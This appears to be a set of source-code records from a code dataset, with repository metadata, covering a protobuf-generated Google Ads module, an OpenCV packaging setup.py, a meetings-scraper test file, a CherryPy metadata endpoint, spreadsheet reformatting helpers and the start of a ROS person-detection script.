number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A%\n#googleads.googleapis.com/GenderView', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=264,
serialized_end=354,
)
DESCRIPTOR.message_types_by_name['GetGenderViewRequest'] = _GETGENDERVIEWREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetGenderViewRequest = _reflection.GeneratedProtocolMessageType('GetGenderViewRequest', (_message.Message,), {
'DESCRIPTOR' : _GETGENDERVIEWREQUEST,
'__module__' : 'google.ads.googleads.v6.services.gender_view_service_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.GetGenderViewRequest)
})
_sym_db.RegisterMessage(GetGenderViewRequest)
DESCRIPTOR._options = None
_GETGENDERVIEWREQUEST.fields_by_name['resource_name']._options = None
_GENDERVIEWSERVICE = _descriptor.ServiceDescriptor(
name='GenderViewService',
full_name='google.ads.googleads.v6.services.GenderViewService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com\322A\'https://www.googleapis.com/auth/adwords',
create_key=_descriptor._internal_create_key,
serialized_start=357,
serialized_end=639,
methods=[
_descriptor.MethodDescriptor(
name='GetGenderView',
full_name='google.ads.googleads.v6.services.GenderViewService.GetGenderView',
index=0,
containing_service=None,
input_type=_GETGENDERVIEWREQUEST,
output_type=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_gender__view__pb2._GENDERVIEW,
serialized_options=b'\202\323\344\223\002/\022-/v6/{resource_name=customers/*/genderViews/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_GENDERVIEWSERVICE)
DESCRIPTOR.services_by_name['GenderViewService'] = _GENDERVIEWSERVICE
# @@protoc_insertion_point(module_scope)
| 52.809524
| 1,120
| 0.818034
|
7a701e1a94da219fb124addde8b739c7bbbc65b6
| 3,392
|
py
|
Python
|
src/sdp_readers.py
|
gabrielStanovsky/brat-visualizer
|
b741ea894795f56c46238ec5509d8783f6291a73
|
[
"MIT"
] | 3
|
2019-07-16T20:44:39.000Z
|
2022-03-16T16:08:39.000Z
|
src/sdp_readers.py
|
gabrielStanovsky/brat-visualizer
|
b741ea894795f56c46238ec5509d8783f6291a73
|
[
"MIT"
] | null | null | null |
src/sdp_readers.py
|
gabrielStanovsky/brat-visualizer
|
b741ea894795f56c46238ec5509d8783f6291a73
|
[
"MIT"
] | null | null | null |
"""
Common functions for reading sdp format.
"""
# External imports
import logging
import pdb
from pprint import pprint
from pprint import pformat
from docopt import docopt
import networkx as nx
#import matplotlib.pyplot as plt
# Local imports
#----
def safe_zip(*lists):
"""
Zip while making sure all lists are of same
length.
"""
if lists:
assert(all([len(lists[0]) == len(ls)
for ls in lists[1:]]))
return zip(*lists)
def get_words_and_preds(sdp_lines):
"""
Returns the words in the lines, split to columns.
and the predicates (subset of words).
"""
words = [line.strip().split("\t")
for line in sdp_lines
if (not line.startswith('#')) and \
line.strip()]
preds = [word
for word in words
if word[5] == '+']
return (words, preds)
def get_nx_graph(sdp_lines, remove_singletons = False):
"""
Return a networkx graph representation of the conll
input.
@param remove_singletons: Indicates whether to remove nodes which
aren't connected to any other node.
"""
graph = nx.MultiDiGraph()
words, preds = get_words_and_preds(sdp_lines)
total_rels = 0
err_cnt = 0
for line in words:
cur_ind = int(line[0]) - 1
graph.add_node(cur_ind,
label = "{}_{}".format(cur_ind, line[1]),
word = line[1])
rels = line[7:]
active_rels = [(rel_ind, rel)
for rel_ind, rel in enumerate(rels)
if rel != "_"]
total_rels += len(active_rels)
for pred_ref, rel in active_rels:
# populate graph with relations
pred_ind = int(preds[pred_ref][0]) - 1
graph.add_edge(pred_ind,
cur_ind,
label = rel)
if remove_singletons:
nodes_to_remove = []
for node in graph.nodes():
if not (nx.descendants(graph, node) or nx.ancestors(graph, node)):
nodes_to_remove.append(node)
for node in nodes_to_remove:
graph.remove_node(node)
return graph
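# Usage sketch (added comment; "example.sdp" is a hypothetical input file):
#     with open("example.sdp") as fin:
#         graph = get_nx_graph(fin.readlines(), remove_singletons=True)
#     print(graph.number_of_nodes(), graph.number_of_edges())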
def draw_graph(graph):
"""
Draw the given graph.
"""
pos = nx.spring_layout(graph)
nx.draw_networkx_nodes(graph,
pos,
node_color = 'w',
linewidths = 0,
node_size = 1500,
node_shape = 's')
nx.draw_networkx_labels(graph,
pos,
labels = nx.get_node_attributes(graph,
'word'))
nx.draw_networkx_edges(graph, pos)
nx.draw_networkx_edge_labels(graph,
pos,
edge_labels = nx.get_edge_attributes(graph,
'label'))
plt.show()
def get_outgoing_edges(graph, node):
"""
Get all outgoing edges from a given node in
a graph.
Includes logic for choosing the ordering of the edges.
"""
return [(node, neighbor, edge_key)
for neighbor, edge_keys
in graph[node].items()
for edge_key in edge_keys]
| 28.745763
| 79
| 0.519458
|
a50746665e4bf18b03f55a396d137aa550a61f39
| 16,344
|
py
|
Python
|
setup.py
|
GArik/opencv-python
|
ad0668838a3446ceddecd3ab7f4bb68435e368d0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
GArik/opencv-python
|
ad0668838a3446ceddecd3ab7f4bb68435e368d0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
GArik/opencv-python
|
ad0668838a3446ceddecd3ab7f4bb68435e368d0
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
import io
import os
import os.path
import sys
import runpy
import subprocess
import re
import sysconfig
import platform
import skbuild
from skbuild import cmaker
def main():
os.chdir(os.path.dirname(os.path.abspath(__file__)))
CI_BUILD = os.environ.get("CI_BUILD", "False")
is_CI_build = True if CI_BUILD == "1" else False
cmake_source_dir = "opencv"
minimum_supported_numpy = "1.13.3"
build_contrib = get_build_env_var_by_name("contrib")
build_headless = get_build_env_var_by_name("headless")
build_java = "ON" if get_build_env_var_by_name("java") else "OFF"
if sys.version_info[:2] >= (3, 6):
minimum_supported_numpy = "1.13.3"
if sys.version_info[:2] >= (3, 7):
minimum_supported_numpy = "1.14.5"
if sys.version_info[:2] >= (3, 8):
minimum_supported_numpy = "1.17.3"
if sys.version_info[:2] >= (3, 9):
minimum_supported_numpy = "1.19.3"
# arm64 is a special case
if sys.version_info[:2] >= (3, 6) and platform.machine() == "aarch64":
minimum_supported_numpy = "1.19.3"
numpy_version = "numpy>=%s" % minimum_supported_numpy
python_version = cmaker.CMaker.get_python_version()
python_lib_path = cmaker.CMaker.get_python_library(python_version).replace(
"\\", "/"
)
python_include_dir = cmaker.CMaker.get_python_include_dir(python_version).replace(
"\\", "/"
)
if os.path.exists(".git"):
import pip._internal.vcs.git as git
g = git.Git() # NOTE: pip API's are internal, this has to be refactored
g.run_command(["submodule", "sync"])
g.run_command(
["submodule", "update", "--init", "--recursive", cmake_source_dir]
)
if build_contrib:
g.run_command(
["submodule", "update", "--init", "--recursive", "opencv_contrib"]
)
package_version, build_contrib, build_headless = get_and_set_info(
build_contrib, build_headless, is_CI_build
)
# https://stackoverflow.com/questions/1405913/python-32bit-or-64bit-mode
x64 = sys.maxsize > 2 ** 32
package_name = "opencovis-python"
if build_contrib and not build_headless:
package_name = "opencovis-contrib-python"
if build_contrib and build_headless:
package_name = "opencovis-contrib-python-headless"
if build_headless and not build_contrib:
package_name = "opencovis-python-headless"
long_description = io.open("README.md", encoding="utf-8").read()
packages = ["cv2", "cv2.data"]
package_data = {
"cv2": ["*%s" % sysconfig.get_config_vars().get("SO"), "version.py"]
+ (["*.dll"] if os.name == "nt" else [])
+ ["LICENSE.txt", "LICENSE-3RD-PARTY.txt"],
"cv2.data": ["*.xml"],
}
# Files from CMake output to copy to package.
# Path regexes with forward slashes relative to CMake install dir.
rearrange_cmake_output_data = {
"cv2": (
[r"bin/opencv_videoio_ffmpeg\d{3}%s\.dll" % ("_64" if x64 else "")]
if os.name == "nt"
else []
)
+
# In Windows, in python/X.Y/<arch>/; in Linux, in just python/X.Y/.
# Naming conventions vary so widely between versions and OSes
# had to give up on checking them.
[
"python/cv2[^/]*%(ext)s"
% {"ext": re.escape(sysconfig.get_config_var("EXT_SUFFIX"))}
],
"cv2.data": [ # OPENCV_OTHER_INSTALL_PATH
("etc" if os.name == "nt" else "share/opencv4") + r"/haarcascades/.*\.xml"
],
}
# Files in sourcetree outside package dir that should be copied to package.
# Raw paths relative to sourcetree root.
files_outside_package_dir = {"cv2": ["LICENSE.txt", "LICENSE-3RD-PARTY.txt"]}
ci_cmake_generator = (
["-G", "Visual Studio 14" + (" Win64" if x64 else "")]
if os.name == "nt"
else ["-G", "Unix Makefiles"]
)
cmake_args = (
(ci_cmake_generator if is_CI_build else [])
+ [
# skbuild inserts PYTHON_* vars. That doesn't satisfy opencv build scripts in case of Py3
"-DPYTHON3_EXECUTABLE=%s" % sys.executable,
"-DPYTHON3_INCLUDE_DIR=%s" % python_include_dir,
"-DPYTHON3_LIBRARY=%s" % python_lib_path,
"-DBUILD_opencv_python3=ON",
"-DBUILD_opencv_python2=OFF",
# Disable the Java build by default as it is not needed
"-DBUILD_opencv_java=%s" % build_java,
# When off, adds __init__.py and a few more helper .py's. We use our own helper files with a different structure.
"-DOPENCV_SKIP_PYTHON_LOADER=ON",
# Relative dir to install the built module to in the build tree.
# The default is generated from sysconfig, we'd rather have a constant for simplicity
"-DOPENCV_PYTHON3_INSTALL_PATH=python",
# Otherwise, opencv scripts would want to install `.pyd' right into site-packages,
# and skbuild bails out on seeing that
"-DINSTALL_CREATE_DISTRIB=ON",
# See opencv/CMakeLists.txt for options and defaults
"-DBUILD_opencv_apps=OFF",
"-DBUILD_SHARED_LIBS=OFF",
"-DBUILD_TESTS=OFF",
"-DBUILD_PERF_TESTS=OFF",
"-DBUILD_DOCS=OFF",
]
+ (
["-DOPENCV_EXTRA_MODULES_PATH=" + os.path.abspath("opencv_contrib/modules")]
if build_contrib
else []
)
)
if build_headless:
# it seems that cocoa cannot be disabled so on macOS the package is not truly headless
cmake_args.append("-DWITH_WIN32UI=OFF")
cmake_args.append("-DWITH_QT=OFF")
cmake_args.append("-DWITH_GTK=OFF")
if is_CI_build:
cmake_args.append(
"-DWITH_MSMF=OFF"
) # see: https://github.com/skvark/opencv-python/issues/263
if sys.platform.startswith("linux") and not x64 and "bdist_wheel" in sys.argv:
subprocess.check_call("patch -p0 < patches/patchOpenEXR", shell=True)
# OS-specific components during CI builds
if is_CI_build:
if (
not build_headless
and "bdist_wheel" in sys.argv
and sys.platform.startswith("linux")
):
cmake_args.append("-DWITH_QT=5")
subprocess.check_call("patch -p1 < patches/patchQtPlugins", shell=True)
if sys.platform.startswith("linux"):
rearrange_cmake_output_data["cv2.qt.plugins.platforms"] = [
(r"lib/qt/plugins/platforms/libqxcb\.so")
]
# add fonts for Qt5
fonts = []
for file in os.listdir("/usr/share/fonts/dejavu"):
if file.endswith(".ttf"):
fonts.append(
(r"lib/qt/fonts/dejavu/%s\.ttf" % file.split(".")[0])
)
rearrange_cmake_output_data["cv2.qt.fonts"] = fonts
if sys.platform == "darwin":
rearrange_cmake_output_data["cv2.qt.plugins.platforms"] = [
(r"lib/qt/plugins/platforms/libqcocoa\.dylib")
]
if sys.platform.startswith("linux"):
cmake_args.append("-DWITH_V4L=ON")
cmake_args.append("-DWITH_LAPACK=ON")
cmake_args.append("-DENABLE_PRECOMPILED_HEADERS=OFF")
# https://github.com/scikit-build/scikit-build/issues/479
if "CMAKE_ARGS" in os.environ:
import shlex
cmake_args.extend(shlex.split(os.environ["CMAKE_ARGS"]))
del shlex
# works via side effect
RearrangeCMakeOutput(
rearrange_cmake_output_data, files_outside_package_dir, package_data.keys()
)
skbuild.setup(
name=package_name,
version=package_version,
url="https://github.com/GArik/opencv-python",
license="MIT",
description="Wrapper package for OpenCV python bindings.",
long_description=long_description,
long_description_content_type="text/markdown",
packages=packages,
package_data=package_data,
maintainer="Igor Murzov",
ext_modules=EmptyListWithLength(),
install_requires=numpy_version,
python_requires=">=3.6",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Information Technology",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Operating System :: Unix",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: C++",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Image Recognition",
"Topic :: Software Development",
],
cmake_args=cmake_args,
cmake_source_dir=cmake_source_dir,
)
class RearrangeCMakeOutput(object):
"""
Patch SKBuild logic to only take files related to the Python package
and construct a file hierarchy that SKBuild expects (see below)
"""
_setuptools_wrap = None
# Have to wrap a function reference, or it's converted
# into an instance method on attr assignment
import argparse
wraps = argparse.Namespace(_classify_installed_files=None)
del argparse
package_paths_re = None
packages = None
files_outside_package = None
def __init__(self, package_paths_re, files_outside_package, packages):
cls = self.__class__
assert not cls.wraps._classify_installed_files, "Singleton object"
import skbuild.setuptools_wrap
cls._setuptools_wrap = skbuild.setuptools_wrap
cls.wraps._classify_installed_files = (
cls._setuptools_wrap._classify_installed_files
)
cls._setuptools_wrap._classify_installed_files = (
self._classify_installed_files_override
)
cls.package_paths_re = package_paths_re
cls.files_outside_package = files_outside_package
cls.packages = packages
def __del__(self):
cls = self.__class__
cls._setuptools_wrap._classify_installed_files = (
cls.wraps._classify_installed_files
)
cls.wraps._classify_installed_files = None
cls._setuptools_wrap = None
def _classify_installed_files_override(
self,
install_paths,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
cmake_source_dir,
cmake_install_reldir,
):
"""
From all CMake output, we're only interested in a few files
and must place them into CMake install dir according
to Python conventions for SKBuild to find them:
package\
file
subpackage\
etc.
"""
cls = self.__class__
# 'relpath'/'reldir' = relative to CMAKE_INSTALL_DIR/cmake_install_dir
# 'path'/'dir' = relative to sourcetree root
cmake_install_dir = os.path.join(
cls._setuptools_wrap.CMAKE_INSTALL_DIR(), cmake_install_reldir
)
install_relpaths = [
os.path.relpath(p, cmake_install_dir) for p in install_paths
]
fslash_install_relpaths = [
p.replace(os.path.sep, "/") for p in install_relpaths
]
relpaths_zip = list(zip(fslash_install_relpaths, install_relpaths))
del install_relpaths, fslash_install_relpaths
final_install_relpaths = []
print("Copying files from CMake output")
for package_name, relpaths_re in cls.package_paths_re.items():
package_dest_reldir = package_name.replace(".", os.path.sep)
for relpath_re in relpaths_re:
found = False
r = re.compile(relpath_re + "$")
for fslash_relpath, relpath in relpaths_zip:
m = r.match(fslash_relpath)
if not m:
continue
found = True
new_install_relpath = os.path.join(
package_dest_reldir, os.path.basename(relpath)
)
cls._setuptools_wrap._copy_file(
os.path.join(cmake_install_dir, relpath),
os.path.join(cmake_install_dir, new_install_relpath),
hide_listing=False,
)
final_install_relpaths.append(new_install_relpath)
del m, fslash_relpath, new_install_relpath
else:
if not found:
raise Exception("Not found: '%s'" % relpath_re)
del r, found
del relpaths_zip
print("Copying files from non-default sourcetree locations")
for package_name, paths in cls.files_outside_package.items():
package_dest_reldir = package_name.replace(".", os.path.sep)
for path in paths:
new_install_relpath = os.path.join(
package_dest_reldir,
# Don't yet have a need to copy
# to subdirectories of package dir
os.path.basename(path),
)
cls._setuptools_wrap._copy_file(
path,
os.path.join(cmake_install_dir, new_install_relpath),
hide_listing=False,
)
final_install_relpaths.append(new_install_relpath)
final_install_paths = [
os.path.join(cmake_install_dir, p) for p in final_install_relpaths
]
return (cls.wraps._classify_installed_files)(
final_install_paths,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
# To get around a check that prepends source dir to paths and breaks package detection code.
cmake_source_dir="",
cmake_install_dir=cmake_install_reldir,
)
def get_and_set_info(contrib, headless, ci_build):
# cv2/version.py should be generated by running find_version.py
version = {}
here = os.path.abspath(os.path.dirname(__file__))
version_file = os.path.join(here, "cv2", "version.py")
# generate a fresh version.py always when Git repository exists
# (in sdists the version.py file already exists)
if os.path.exists(".git"):
old_args = sys.argv.copy()
sys.argv = ["", str(contrib), str(headless), str(ci_build)]
runpy.run_path("find_version.py", run_name="__main__")
sys.argv = old_args
with open(version_file) as fp:
exec(fp.read(), version)
return version["opencv_version"], version["contrib"], version["headless"]
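# Usage sketch (the flag values here are illustrative; in this script they are
# normally resolved from the build environment, see get_build_env_var_by_name
# below):
#
#     opencv_version, build_contrib, build_headless = get_and_set_info(
#         contrib=False, headless=False, ci_build=True
#     )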
def get_build_env_var_by_name(flag_name):
flag_set = False
try:
flag_set = bool(int(os.getenv("ENABLE_" + flag_name.upper(), None)))
except Exception:
pass
if not flag_set:
try:
flag_set = bool(int(open(flag_name + ".enabled").read(1)))
except Exception:
pass
return flag_set
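# The helper above accepts either of two switches per flag; for a hypothetical
# flag named "contrib" both of these (illustrative) forms make
# get_build_env_var_by_name("contrib") return True:
#
#     export ENABLE_CONTRIB=1        # environment-variable form
#     echo 1 > contrib.enabled       # marker-file form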
# This creates a list which is empty but returns a length of 1.
# Should make the wheel a binary distribution and platlib compliant.
class EmptyListWithLength(list):
def __len__(self):
return 1
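# Quick illustration of the trick described above (kept in comments so the
# build script itself is unchanged): setuptools only checks the truthiness of
# ext_modules when deciding whether the wheel is platform-specific.
#
#     ext_modules = EmptyListWithLength()
#     bool(ext_modules)   # True  -> wheel is treated as a binary distribution
#     list(ext_modules)   # []    -> yet there is nothing extra to compile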
if __name__ == "__main__":
main()
| 35.68559
| 125
| 0.596427
|
ec576e197844f7c2320e2b6563d77fd1569e417b
| 2,298
|
py
|
Python
|
tests/test_chi_ssa_1.py
|
zarifmahmud/city-scrapers
|
52d6056001c8ea5e100dd686c52947836d63aff9
|
[
"MIT"
] | null | null | null |
tests/test_chi_ssa_1.py
|
zarifmahmud/city-scrapers
|
52d6056001c8ea5e100dd686c52947836d63aff9
|
[
"MIT"
] | null | null | null |
tests/test_chi_ssa_1.py
|
zarifmahmud/city-scrapers
|
52d6056001c8ea5e100dd686c52947836d63aff9
|
[
"MIT"
] | null | null | null |
from datetime import date, time
import pytest
from freezegun import freeze_time
from tests.utils import file_response
from city_scrapers.constants import COMMISSION, CONFIRMED, PASSED, TENTATIVE
from city_scrapers.spiders.chi_ssa_1 import ChiSsa1Spider
test_response = file_response('files/chi_ssa_1.html')
spider = ChiSsa1Spider()
freezer = freeze_time('2018-10-12 12:00:00')
freezer.start()
parsed_items = [item for item in spider.parse(test_response) if isinstance(item, dict)]
freezer.stop()
def test_start():
assert parsed_items[0]['start'] == {'date': date(2018, 1, 16), 'time': time(14, 0), 'note': ''}
def test_id():
assert parsed_items[0]['id'] == ('chi_ssa_1/201801161400/x/state_street_commission')
def test_status():
assert parsed_items[0]['status'] == PASSED
assert parsed_items[5]['status'] == CONFIRMED
assert parsed_items[-1]['status'] == TENTATIVE
def test_documents():
assert parsed_items[0]['documents'] == [{
'url':
'https://loopchicago.com/assets/State-Street-Commission-Meeting-Minutes/da3d4977e1/2018-january-16-ssc-meeting-minutes.pdf', # noqa
'note': 'Minutes',
}]
assert parsed_items[-1]['documents'] == []
@pytest.mark.parametrize('item', parsed_items)
def test_name(item):
assert item['name'] == 'State Street Commission'
@pytest.mark.parametrize('item', parsed_items)
def test_description(item):
assert item['event_description'] == ''
@pytest.mark.parametrize('item', parsed_items)
def test_end(item):
assert item['end']['date'] == item['start']['date']
assert item['end']['time'] is None
@pytest.mark.parametrize('item', parsed_items)
def test_all_day(item):
assert item['all_day'] is False
@pytest.mark.parametrize('item', parsed_items)
def test_location(item):
assert item['location'] == {
'address': '190 N State St Chicago, IL 60601',
'name': 'ABC 7 Chicago',
'neighborhood': '',
}
@pytest.mark.parametrize('item', parsed_items)
def test_classification(item):
assert item['classification'] == COMMISSION
@pytest.mark.parametrize('item', parsed_items)
def test_sources(item):
assert len(item['sources']) == 1
@pytest.mark.parametrize('item', parsed_items)
def test__type(item):
assert item['_type'] == 'event'
| 26.413793
| 144
| 0.695387
|
8fcde5aa01b53c0a475451d3b45264a00c1c9f47
| 1,332
|
py
|
Python
|
deli_menu/http/mounts/root/routes/metadata.py
|
sandwichcloud/deli-menu
|
ca7a3a88b71188124dc174e810c17e8b19a320b4
|
[
"MIT"
] | null | null | null |
deli_menu/http/mounts/root/routes/metadata.py
|
sandwichcloud/deli-menu
|
ca7a3a88b71188124dc174e810c17e8b19a320b4
|
[
"MIT"
] | null | null | null |
deli_menu/http/mounts/root/routes/metadata.py
|
sandwichcloud/deli-menu
|
ca7a3a88b71188124dc174e810c17e8b19a320b4
|
[
"MIT"
] | null | null | null |
import cherrypy
from ingredients_db.models.instance import Instance
from ingredients_db.models.region import Region
from ingredients_db.models.zones import Zone
from ingredients_http.route import Route
from ingredients_http.router import Router
class MetaDataRouter(Router):
def __init__(self):
super().__init__(uri_base='meta-data')
@Route()
@cherrypy.tools.json_out()
def get(self):
with cherrypy.request.db_session() as session:
instance = session.query(Instance).filter(Instance.id == cherrypy.request.instance_id).first()
region = session.query(Region).filter(Region.id == instance.region_id).first()
zone = session.query(Zone).filter(Zone.id == instance.zone_id).first()
keypairs = []
for keypair in instance.keypairs:
keypairs.append(keypair.public_key)
# Strip out user-data
tags = instance.tags if instance.tags is not None else {}
if 'user-data' in tags:
del tags['user-data']
metadata = {
'ami-id': instance.image_id,
'instance-id': instance.id,
'region': region.name,
'availability-zone': zone.name,
'tags': tags,
'public-keys': keypairs
}
return metadata
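# Example response shape for a GET against this router's "meta-data" base URI
# (all values below are illustrative):
#
#     {
#         "ami-id": "...", "instance-id": "...", "region": "us-east",
#         "availability-zone": "a", "tags": {}, "public-keys": ["ssh-rsa ..."]
#     }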
| 32.487805
| 106
| 0.623874
|
d4f109f265a9ef80d103ea28f7cb435d0da19e52
| 220
|
py
|
Python
|
mirumon/main.py
|
mirumon/mirumon-backend
|
9b4d914b67dcc839ed8264f470e822dc22c98ad7
|
[
"MIT"
] | 19
|
2020-01-25T22:52:09.000Z
|
2022-03-20T13:45:10.000Z
|
mirumon/main.py
|
mirumon/mirumon-backend
|
9b4d914b67dcc839ed8264f470e822dc22c98ad7
|
[
"MIT"
] | 15
|
2019-10-07T18:18:40.000Z
|
2020-10-17T15:47:39.000Z
|
mirumon/main.py
|
mirumon/mirumon-backend
|
9b4d914b67dcc839ed8264f470e822dc22c98ad7
|
[
"MIT"
] | 1
|
2020-01-20T14:16:29.000Z
|
2020-01-20T14:16:29.000Z
|
import uvicorn
from mirumon.api.asgi import create_app
from mirumon.settings.config import get_app_settings
settings = get_app_settings()
app = create_app(settings)
if __name__ == "__main__":
uvicorn.run(app=app)
| 20
| 52
| 0.786364
|
a5430cf8e3823cb1bf637dca2a204efd8777c749
| 5,568
|
py
|
Python
|
modifiers.py
|
mglac/S2C-excel-modifier-for-trading
|
03237c14cf60c715a43607cb53f33314674524d1
|
[
"MIT"
] | null | null | null |
modifiers.py
|
mglac/S2C-excel-modifier-for-trading
|
03237c14cf60c715a43607cb53f33314674524d1
|
[
"MIT"
] | null | null | null |
modifiers.py
|
mglac/S2C-excel-modifier-for-trading
|
03237c14cf60c715a43607cb53f33314674524d1
|
[
"MIT"
] | null | null | null |
# modifiers.py - This class contains the methods used to alter the portfolio
# spreadsheets to the desired format for trading assets.
import os
from openpyxl import styles
from openpyxl import load_workbook
from openpyxl import Workbook
from tkinter import filedialog
from tkinter import Text
# excel_modifications Method
# This method takes the file path to the workbook being read along with the
# file path to the location the user wants the new workbooks to be stored at.
def excel_modifications(file_path, storage_path):
init_wb = load_workbook(file_path, data_only=True) # loads workbook
for ws in init_wb:
if ws.title == "CORE":
# checks if the current worksheet is the CORE worksheet
core_compression(ws, storage_path)
if ws.title == "Infl":
# checks if the current worksheet is the Infl worksheet
infl_compression(ws, storage_path)
if ws.title == "FI" or ws.sheet_properties.tabColor.theme == 9:
            # checks if the current worksheet is the FI worksheet or if the
            # current worksheet's tab is colored green
common_compression(ws, storage_path)
# common_compression method
# This method is used to modify any portfolio worksheet along with the Fixed
# Income worksheet. This is done to prepare the worksheet for trading.
def common_compression(worksheet, storage_path):
new_wb = Workbook() # creates a new workbook to write to
new_ws = new_wb.active # opens to the active worksheet in the new workbook
new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title
new_ws_ticker_list = [] # a list of tickers
new_ws_percent_list = [] # a list of percents corresponding to tickers
for row in worksheet.values: # Iterates through all of the rows in the ws
curr_percent = row[0]
curr_ticker = row[1]
if isinstance(curr_percent, float) and isinstance(curr_ticker, str):
new_ws_ticker_list.append(str(curr_ticker))
new_ws_percent_list.append(curr_percent)
for i in range(len(new_ws_ticker_list) + 1):
if i == 0:
# Titles the column as Security
new_ws.cell(1, 1).value = 'Security'
new_ws.cell(1, 2).value = '%' # Titles the column as %
else:
new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1]
new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1]
new_ws.cell(i+1, 1).number_format = '0.000%'
new_ws.cell(i+1, 2).number_format = '0.000%'
# Saves in specified file location
new_wb.save(storage_path + "\\" + str(new_ws.title))
# core_compression method
# This method is used to modify the Core Stocks worksheet. This is done to
# prepare the worksheet for trading.
def core_compression(worksheet, storage_path):
new_wb = Workbook() # creates a new workbook to write to
new_ws = new_wb.active # opens to the active worksheet in the new workbook
new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title
new_ws_ticker_list = [] # a list of tickers
new_ws_percent_list = [] # a list of percents corresponding to tickers
for row in worksheet.values: # Iterates through all of the rows in the ws
curr_percent = row[3]
curr_ticker = row[0]
if isinstance(curr_percent, float) and isinstance(curr_ticker, str):
new_ws_ticker_list.append(str(curr_ticker))
new_ws_percent_list.append(curr_percent)
for i in range(len(new_ws_ticker_list) + 1):
if i == 0:
# Titles the column as Security
new_ws.cell(1, 1).value = 'Security'
new_ws.cell(1, 2).value = '%' # Titles the column as %
else:
new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1]
new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1]
new_ws.cell(i+1, 1).number_format = '0.000%'
new_ws.cell(i+1, 2).number_format = '0.000%'
# Saves in specified file location
new_wb.save(storage_path + "\\" + str(new_ws.title))
# infl_compression method
# This method is used to modify the Inflation Model worksheet. This is done to
# prepare the worksheet for trading.
def infl_compression(worksheet, storage_path):
new_wb = Workbook() # creates a new workbook to write to
new_ws = new_wb.active # opens to the active worksheet in the new workbook
new_ws.title = worksheet.title + ".xlsx" # creates the new workbook title
new_ws_ticker_list = [] # a list of tickers
new_ws_percent_list = [] # a list of percents corresponding to tickers
for row in worksheet.values: # Iterates through all of the rows in the ws
curr_percent = row[2]
curr_ticker = row[0]
if isinstance(curr_percent, float) and isinstance(curr_ticker, str):
new_ws_ticker_list.append(str(curr_ticker))
new_ws_percent_list.append(curr_percent)
for i in range(len(new_ws_ticker_list) + 1):
if i == 0:
# Titles the column as Security
new_ws.cell(1, 1).value = 'Security'
new_ws.cell(1, 2).value = '%' # Titles the column as %
else:
new_ws.cell(i+1, 1).value = new_ws_ticker_list[i-1]
new_ws.cell(i+1, 2).value = new_ws_percent_list[i-1]
new_ws.cell(i+1, 1).number_format = '0.000%'
new_ws.cell(i+1, 2).number_format = '0.000%'
# Saves in specified file location
new_wb.save(storage_path + "\\" + str(new_ws.title))
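# Example invocation (a sketch; the two paths are hypothetical and would
# normally be collected via the tkinter file dialogs imported above):
#
#     excel_modifications(
#         file_path=r"C:\portfolios\model_portfolio.xlsx",
#         storage_path=r"C:\portfolios\trading_sheets",
#     )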
| 45.639344
| 79
| 0.663973
|
ccd22d7f32a2c08ed895a76d5482386df233260a
| 5,693
|
py
|
Python
|
person_tracking/scripts/real_time_object_detection.py
|
CARMinesDouai/2020-RobotGuide-Freight
|
123f4ba42f09b36038b519c69fc42208478408f2
|
[
"MIT"
] | null | null | null |
person_tracking/scripts/real_time_object_detection.py
|
CARMinesDouai/2020-RobotGuide-Freight
|
123f4ba42f09b36038b519c69fc42208478408f2
|
[
"MIT"
] | null | null | null |
person_tracking/scripts/real_time_object_detection.py
|
CARMinesDouai/2020-RobotGuide-Freight
|
123f4ba42f09b36038b519c69fc42208478408f2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# USAGE
# python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel
# import the necessary packages
from imutils.video import VideoStream
from imutils.video import FPS
from geometry_msgs.msg import Twist
from sensor_msgs.msg import LaserScan
import numpy as np
import argparse
import imutils
import time
import cv2
import rospy
startX=0
startY=0
endX=0
endY=0
start_robot=0
max_size_X=0
max_size_Y=0
mean_dist_right=0
mean_dist_left=0
last_startX=0
last_endX=0
obstacle_detected=1
person_lost=0
idx=0
vel_msg=Twist()
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", required=True,
help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.2,
help="minimum probability to filter weak detections")
args = vars(ap.parse_args())
# initialize the list of class labels MobileNet SSD was trained to
# detect, then generate a set of bounding box colors for each class
CLASSES = ["background", "aeroplane", "bicycle", "bird", "boat",
